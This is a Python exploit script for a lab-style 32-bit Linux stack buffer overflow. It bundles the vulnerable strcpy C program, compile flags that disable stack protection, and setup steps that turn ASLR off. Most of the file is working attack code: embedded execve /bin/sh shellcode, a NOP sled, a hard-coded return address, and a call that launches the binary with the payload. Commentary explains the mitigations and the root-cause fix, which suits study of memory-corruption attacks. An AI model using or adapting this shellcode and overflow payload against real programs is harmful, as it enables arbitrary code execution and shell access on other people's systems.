#!/bin/python
from subprocess import call
#-----------------------------------------------------------------------------------------------#
# Exploit: Simple Linux 32-bit Buffer Overflow, C strcpy argv[1]. #
# OS: Tested in Ubuntu 12.04 i386 #
# #
# Author: Oraclox (Brandon ceja) #
#-----------------------------------------------------------------------------------------------#
# Vulnerable C code: #
#-----------------------------------------------------------------------------------------------#
# #include <stdio.h> #
# #include <string.h> #
# #
# int main(int argc, char* argv[]){ #
# char buf[256]; #
# strcpy(buf, argv[1]); #
# printf("Input:%s\n", buf); #
# return 0; #
# } #
#-----------------------------------------------------------------------------------------------#
# Compiled with: gcc -g -fno-stack-protector -z execstack -o vuln vuln.c #
# ASLR turned off: sysctl kernel.randomize_va_space = 0 #
#-----------------------------------------------------------------------------------------------#
#-----------------------------------------------------------------------------------------------#
# Shellcode: Linux/x86 execve /bin/sh shellcode 23 bytes #
# From: Hamza Megahed, http://shell-storm.org/shellcode/files/shellcode-827.php #
#-----------------------------------------------------------------------------------------------#
# Payload part 1: the 23-byte shellcode credited in the header above (per that
# header, Linux/x86 execve of /bin/sh). It is bound to a name so that its
# length can be subtracted from the padding computed below.
shellcode = (
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)
#-----------------------------------------------------------------------------------------------#
# Return address, EIP back to NOP's in buffer #
# EIP -> 0xbffff4e0 #
#-----------------------------------------------------------------------------------------------#
# 0xbffff4e0 written least-significant byte first (little-endian x86).
# The address is hard-coded, so it is only meaningful for the lab build
# described in the header: ASLR off (kernel.randomize_va_space = 0),
# -fno-stack-protector and -z execstack. Each of those switches disables a
# mitigation that targets one step of this technique: address randomisation
# makes a fixed stack address unreliable, the stack protector checks for an
# overwritten frame before the function returns, and a non-executable stack
# stops bytes placed in buf from running as code.
retAddr = "\xe0\xf4\xff\xbf"
# Layout: NOP (0x90) padding plus the shellcode fill exactly 268 bytes, and the
# 4-byte return address follows. buf in vuln.c is 256 bytes and strcpy() copies
# argv[1] without a bounds check, so everything past byte 256 lands on
# adjacent stack data. The root-cause fix is in the C code: copy with an
# explicit size limit and reject over-long input.
# NOTE(review): 268 is presumably the distance from buf to the saved return
# address in this particular build; it depends on compiler version and flags.
evil = "\x90" * (268-len(shellcode)) + shellcode + retAddr
print("Executing vulnerable program...")
# The payload is handed to ./vuln as argv[1]; the list form of call() runs the
# binary directly, with no shell in between.
call(["./vuln", evil])